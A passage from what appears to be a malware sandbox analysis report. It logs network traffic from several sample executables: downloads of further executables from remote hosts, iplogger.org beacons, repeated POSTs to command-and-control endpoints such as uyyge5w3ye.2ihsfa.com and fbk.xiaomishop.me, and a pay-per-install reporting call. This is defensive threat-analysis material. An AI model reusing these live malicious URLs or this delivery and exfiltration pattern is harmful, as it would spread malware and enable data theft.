        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
        Content-Length: 266
        Host: uyyge5w3ye.2ihsfa.com
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Fri, 11 Jun 2021 17:48:47 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        Vary: Accept-Encoding
        X-Powered-By: PHP/7.3.21
      • flag-unknown
        GET
        https://iplogger.org/18hh57
        gaoou.exe
        Remote address:
        88.99.66.31:443
        Request
        GET /18hh57 HTTP/1.1
        Connection: Keep-Alive
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
        viewport-width: 1920
        Host: iplogger.org
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Fri, 11 Jun 2021 17:48:47 GMT
        Content-Type: image/png
        Transfer-Encoding: chunked
        Connection: keep-alive
        Set-Cookie: PHPSESSID=7nl4s54ebstks7v9r8h1asg8g4; path=/; HttpOnly
        Pragma: no-cache
        Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=255614464; path=/
        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
        Cache-Control: no-cache
        Expires: Thu, 01 Jan 1970 00:00:01 GMT
        Answers:
        whoami: 4c38501b4c5aaf3cd2110790c1c4143772251fc8a57642aeaa13ea09d06e72a2
        Strict-Transport-Security: max-age=31536000; preload
        X-Frame-Options: DENY
      • 104.21.9.70:443
        https://pirod-dcn.xyz/?id=bj6
        tls, http
        JoSetp.exe
        1.3kB
        9.0kB
        13
        19

        HTTP Request

        GET https://pirod-dcn.xyz/?id=bj1

        HTTP Response

        200

        HTTP Request

        GET https://pirod-dcn.xyz/?id=bj2

        HTTP Response

        200

        HTTP Request

        GET https://pirod-dcn.xyz/?id=bj3

        HTTP Response

        200

        HTTP Request

        GET https://pirod-dcn.xyz/?id=bj4

        HTTP Response

        200

        HTTP Request

        GET https://pirod-dcn.xyz/?id=bj5

        HTTP Response

        200

        HTTP Request

        GET https://pirod-dcn.xyz/?id=bj6

        HTTP Response

        200
      • 88.99.66.31:443
        https://iplogger.org/1p6br7
        tls, http
        JoSetp.exe
        805 B
        6.3kB
        10
        9

        HTTP Request

        GET https://iplogger.org/1p6br7

        HTTP Response

        200
      • 99.83.154.118:80
        http://global-sc-ltd.com/EbBkqVdkm4Ebeb_EXes_nhQRrZqYVKhyGK8YF2zAUuC3J/C_Blazer_Sha/UltraMediaBurner.exe
        http
        Install.tmp
        960 B
        13.1kB
        11
        14

        HTTP Request

        HEAD http://global-sc-ltd.com/EbBkqVdkm4Ebeb_EXes_nhQRrZqYVKhyGK8YF2zAUuC3J/C_Blazer_Sha/UltraMediaBurner.exe

        HTTP Response

        200

        HTTP Request

        GET http://global-sc-ltd.com/EbBkqVdkm4Ebeb_EXes_nhQRrZqYVKhyGK8YF2zAUuC3J/C_Blazer_Sha/UltraMediaBurner.exe

        HTTP Response

        200
      • 88.99.66.31:443
        https://iplogger.org/1in2a7
        tls, http
        filee.exe
        868 B
        6.3kB
        10
        9

        HTTP Request

        GET https://iplogger.org/1in2a7

        HTTP Response

        200
      • 162.144.12.143:80
        http://hirezz.com/test/includes/soft.exe
        http
        filee.exe
        996 B
        4.0kB
        10
        11

        HTTP Request

        GET http://hirezz.com/test/includes/fw1.php

        HTTP Response

        302

        HTTP Request

        GET http://hirezz.com/cgi-sys/suspendedpage.cgi

        HTTP Response

        200

        HTTP Request

        GET http://hirezz.com/test/includes/fw2.php

        HTTP Response

        302

        HTTP Request

        GET http://hirezz.com/test/includes/fw3.exe

        HTTP Response

        302

        HTTP Request

        GET http://hirezz.com/test/includes/fw4.exe

        HTTP Response

        302

        HTTP Request

        GET http://hirezz.com/test/includes/fw5.exe

        HTTP Response

        302

        HTTP Request

        GET http://hirezz.com/test/includes/soft.exe

        HTTP Response

        302
      • 88.99.66.31:443
        iplogger.org
        tls
        IEXPLORE.EXE
        773 B
        5.5kB
        10
        10
      • 88.99.66.31:443
        https://iplogger.org/favicon.ico
        tls, http
        IEXPLORE.EXE
        1.8kB
        23.8kB
        18
        23

        HTTP Request

        GET https://iplogger.org/1rFsB6

        HTTP Response

        200

        HTTP Request

        GET https://iplogger.org/favicon.ico

        HTTP Response

        200
      • 101.36.107.74:80
        http://101.36.107.74/seemorebty/il.php?e=jg6_6asg
        http
        jg6_6asg.exe
        644 B
        407 B
        5
        3

        HTTP Request

        GET http://101.36.107.74/seemorebty/il.php?e=jg6_6asg

        HTTP Response

        200
      • 88.99.66.31:443
        https://iplogger.org/ZhvS4
        tls, http
        jg6_6asg.exe
        1.1kB
        7.1kB
        9
        9

        HTTP Request

        GET https://iplogger.org/ZhvS4

        HTTP Response

        200
      • 208.95.112.1:80
        http://ip-api.com/json/
        http
        gaoou.exe
        774 B
        672 B
        6
        4

        HTTP Request

        GET http://ip-api.com/json/

        HTTP Response

        200
      • 157.240.221.35:443
        https://www.facebook.com/
        tls, http
        gaoou.exe
        11.0kB
        523.4kB
        206
        383

        HTTP Request

        GET https://www.facebook.com/

        HTTP Response

        200

        HTTP Request

        GET https://www.facebook.com/

        HTTP Response

        200
      • 88.218.92.148:80
        http://uyyge5w3ye.2ihsfa.com/api/?sid=39837&key=b5cf3474a00f667b3ba7c0b9846f1777
        http
        gaoou.exe
        1.2kB
        821 B
        8
        7

        HTTP Request

        GET http://uyyge5w3ye.2ihsfa.com/api/fbtime

        HTTP Response

        200

        HTTP Request

        POST http://uyyge5w3ye.2ihsfa.com/api/?sid=39837&key=b5cf3474a00f667b3ba7c0b9846f1777

        HTTP Response

        200
      • 142.250.179.206:443
        https://script.google.com/macros/s/AKfycbyeDUociDSMjODhy_ZapM5zzyoJ3zrch9n5IUJeKIM3UQOEtZs/exec?loc=NL&app=Staoism&payoutcents=0.08&ver=3.5&ip=154.61.71.51
        tls, http
        gaoou.exe
        1.3kB
        6.8kB
        8
        9

        HTTP Request

        GET https://script.google.com/macros/s/AKfycbyeDUociDSMjODhy_ZapM5zzyoJ3zrch9n5IUJeKIM3UQOEtZs/exec?loc=NL&app=Staoism&payoutcents=0.08&ver=3.5&ip=154.61.71.51
      • 216.239.32.29:80
        http://pki.goog/gsr1/gsr1.crt
        http
        gaoou.exe
        357 B
        3.0kB
        5
        4

        HTTP Request

        GET http://pki.goog/gsr1/gsr1.crt

        HTTP Response

        200
      • 208.95.112.1:80
        http://ip-api.com/json/?fields=8198
        http
        SystemNetworkService
        1.3kB
        951 B
        9
        6

        HTTP Request

        GET http://ip-api.com/json/?fields=8198

        HTTP Response

        200

        HTTP Request

        GET http://ip-api.com/json/?fields=8198

        HTTP Response

        200

        HTTP Request

        GET http://ip-api.com/json/?fields=8198

        HTTP Response

        200
      • 104.18.9.171:80
        http://fbk.xiaomishop.me/report7.4.php
        http
        SystemNetworkService
        2.2kB
        1.5kB
        10
        11

        HTTP Request

        POST http://fbk.xiaomishop.me/report7.4.php

        HTTP Response

        200

        HTTP Request

        POST http://fbk.xiaomishop.me/report7.4.php

        HTTP Response

        200

        HTTP Request

        POST http://fbk.xiaomishop.me/report7.4.php

        HTTP Response

        200
      • 142.250.179.206:443
        https://script.google.com/macros/s/AKfycbyeDUociDSMjODhy_ZapM5zzyoJ3zrch9n5IUJeKIM3UQOEtZs/exec?loc=NL&app=Staoism&payoutcents=0.08&ver=3.5&ip=154.61.71.51
        tls, http
        gaoou.exe
        1.3kB
        8.3kB
        9
        11

        HTTP Request

        GET https://script.google.com/macros/s/AKfycbyeDUociDSMjODhy_ZapM5zzyoJ3zrch9n5IUJeKIM3UQOEtZs/exec?loc=NL&app=Staoism&payoutcents=0.08&ver=3.5&ip=154.61.71.51

        HTTP Response

        200
      • 88.99.66.31:443
        https://iplogger.org/18hh57
        tls, http
        gaoou.exe
        1.3kB
        7.3kB
        11
        13

        HTTP Request

        GET https://iplogger.org/18hh57

        HTTP Response

        200
      • 204.79.197.200:443
        ieonline.microsoft.com
        tls
        iexplore.exe
        707 B
        7.5kB
        8
        12
      • 31.13.71.36:443
        https://www.facebook.com/
        tls, http
        gaoou.exe
        5.9kB
        263.1kB
        108
        192

        HTTP Request

        GET https://www.facebook.com/

        HTTP Response

        200
      • 88.218.92.148:80
        http://uyyge5w3ye.2ihsfa.com/api/?sid=44039&key=4f9057bc0185ade96367087d96659005
        http
        gaoou.exe
        1.2kB
        1.1kB
        9
        8

        HTTP Request

        GET http://uyyge5w3ye.2ihsfa.com/api/fbtime

        HTTP Response

        200

        HTTP Request

        POST http://uyyge5w3ye.2ihsfa.com/api/?sid=44039&key=4f9057bc0185ade96367087d96659005

        HTTP Response

        200
      • 88.99.66.31:443
        https://iplogger.org/18hh57
        tls, http
        gaoou.exe
        1.3kB
        7.3kB
        11
        13

        HTTP Request

        GET https://iplogger.org/18hh57

        HTTP Response

        200
      • 31.13.64.35:443
        https://www.facebook.com/
        tls, http
        gaoou.exe
        6.0kB
        265.8kB
        111
        198

        HTTP Request

        GET https://www.facebook.com/

        HTTP Response

        200
      • 88.218.92.148:80
        http://uyyge5w3ye.2ihsfa.com/api/?sid=47903&key=caee0f0129dcd9ecf8d90e711e5c6ed9
        http
        gaoou.exe
        1.2kB
        1.1kB
        9
        8

        HTTP Request

        GET http://uyyge5w3ye.2ihsfa.com/api/fbtime

        HTTP Response

        200

        HTTP Request

        POST http://uyyge5w3ye.2ihsfa.com/api/?sid=47903&key=caee0f0129dcd9ecf8d90e711e5c6ed9

        HTTP Response

        200
      • 88.99.66.31:443
        https://iplogger.org/18hh57
        tls, http
        gaoou.exe
        1.3kB
        7.3kB
        11
        13

        HTTP Request

        GET https://iplogger.org/18hh57

        HTTP Response

        200
      • 8.8.8.8:53
        facebook.websmails.com
        dns
        SystemNetworkService
        68 B
        84 B
        1
        1

        DNS Request

        facebook.websmails.com

        DNS Response

        167.179.89.78

      • 8.8.8.8:53
        facebook.websmails.com
        dns
        SystemNetworkService
        68 B
        136 B
        1
        1

        DNS Request

        facebook.websmails.com

      • 167.179.89.78:53
        facebook.websmails.com
        SystemNetworkService
        31.0kB
        340.6kB
        593
        618
      • 8.8.8.8:53
        pirod-dcn.xyz
        dns
        JoSetp.exe
        59 B
        91 B
        1
        1

        DNS Request

        pirod-dcn.xyz

        DNS Response

        104.21.9.70
        172.67.189.44

      • 8.8.8.8:53
        iplogger.org
        dns
        gaoou.exe
        58 B
        74 B
        1
        1

        DNS Request

        iplogger.org

        DNS Response

        88.99.66.31

      • 8.8.8.8:53
        global-sc-ltd.com
        dns
        Install.tmp
        63 B
        79 B
        1
        1

        DNS Request

        global-sc-ltd.com

        DNS Response

        99.83.154.118

      • 8.8.8.8:53
        hirezz.com
        dns
        filee.exe
        56 B
        72 B
        1
        1

        DNS Request

        hirezz.com

        DNS Response

        162.144.12.143

      • 167.179.89.78:53
        facebook.websmails.com
        SystemNetworkService
        61.2kB
        658.9kB
        1165
        1181
      • 8.8.8.8:53
        ip-api.com
        dns
        SystemNetworkService
        56 B
        72 B
        1
        1

        DNS Request

        ip-api.com

        DNS Response

        208.95.112.1

      • 8.8.8.8:53
        www.facebook.com
        dns
        gaoou.exe
        62 B
        107 B
        1
        1

        DNS Request

        www.facebook.com

        DNS Response

        157.240.221.35

      • 8.8.8.8:53
        uyyge5w3ye.2ihsfa.com
        dns
        gaoou.exe
        67 B
        83 B
        1
        1

        DNS Request

        uyyge5w3ye.2ihsfa.com

        DNS Response

        88.218.92.148

      • 8.8.8.8:53
        script.google.com
        dns
        gaoou.exe
        63 B
        79 B
        1
        1

        DNS Request

        script.google.com

        DNS Response

        142.250.179.206

      • 8.8.8.8:53
        pki.goog
        dns
        gaoou.exe
        54 B
        70 B
        1
        1

        DNS Request

        pki.goog

        DNS Response

        216.239.32.29

      • 8.8.8.8:53
        fbk.xiaomishop.me
        dns
        SystemNetworkService
        63 B
        95 B
        1
        1

        DNS Request

        fbk.xiaomishop.me

        DNS Response

        104.18.9.171
        104.18.8.171

      • 8.8.8.8:53
        www.microsoft.com
        dns
        iexplore.exe
        63 B
        230 B
        1
        1

        DNS Request

        www.microsoft.com

        DNS Response

        104.85.1.163

      • 8.8.8.8:53
        www.facebook.com
        dns
        gaoou.exe
        62 B
        107 B
        1
        1

        DNS Request

        www.facebook.com

        DNS Response

        31.13.71.36

      • 8.8.8.8:53
        www.facebook.com
        dns
        gaoou.exe
        62 B
        107 B
        1
        1

        DNS Request

        www.facebook.com

        DNS Response

        31.13.64.35

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/792-98-0x0000000000250000-0x00000000002C0000-memory.dmp

        Filesize

        448KB

      • memory/848-95-0x00000000008A0000-0x00000000008EB000-memory.dmp

        Filesize

        300KB

      • memory/848-91-0x0000000001750000-0x00000000017C0000-memory.dmp

        Filesize

        448KB

      • memory/892-116-0x00000000001D0000-0x00000000001D1000-memory.dmp

        Filesize

        4KB

      • memory/912-106-0x0000000000400000-0x000000000042B000-memory.dmp

        Filesize

        172KB

      • memory/1708-169-0x0000000002CD0000-0x0000000002DD5000-memory.dmp

        Filesize

        1.0MB

      • memory/1708-130-0x0000000000460000-0x00000000004D1000-memory.dmp

        Filesize

        452KB

      • memory/1708-170-0x0000000001C10000-0x0000000001C2A000-memory.dmp

        Filesize

        104KB

      • memory/1708-129-0x0000000000060000-0x00000000000AB000-memory.dmp

        Filesize

        300KB

      • memory/1720-89-0x0000000000140000-0x0000000000141000-memory.dmp

        Filesize

        4KB

      • memory/1720-85-0x00000000001E0000-0x00000000001E1000-memory.dmp

        Filesize

        4KB

      • memory/1720-94-0x0000000000470000-0x0000000000472000-memory.dmp

        Filesize

        8KB

      • memory/1720-87-0x0000000000130000-0x0000000000131000-memory.dmp

        Filesize

        4KB

      • memory/1720-88-0x0000000000210000-0x000000000022C000-memory.dmp

        Filesize

        112KB

      • memory/1756-122-0x0000000000080000-0x000000000008D000-memory.dmp

        Filesize

        52KB

      • memory/1940-59-0x0000000075631000-0x0000000075633000-memory.dmp

        Filesize

        8KB

      • memory/1952-93-0x0000000000510000-0x000000000056C000-memory.dmp

        Filesize

        368KB

      • memory/1952-92-0x0000000001FC0000-0x00000000020C1000-memory.dmp

        Filesize

        1.0MB

      • memory/1952-90-0x0000000010000000-0x0000000010002000-memory.dmp

        Filesize

        8KB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.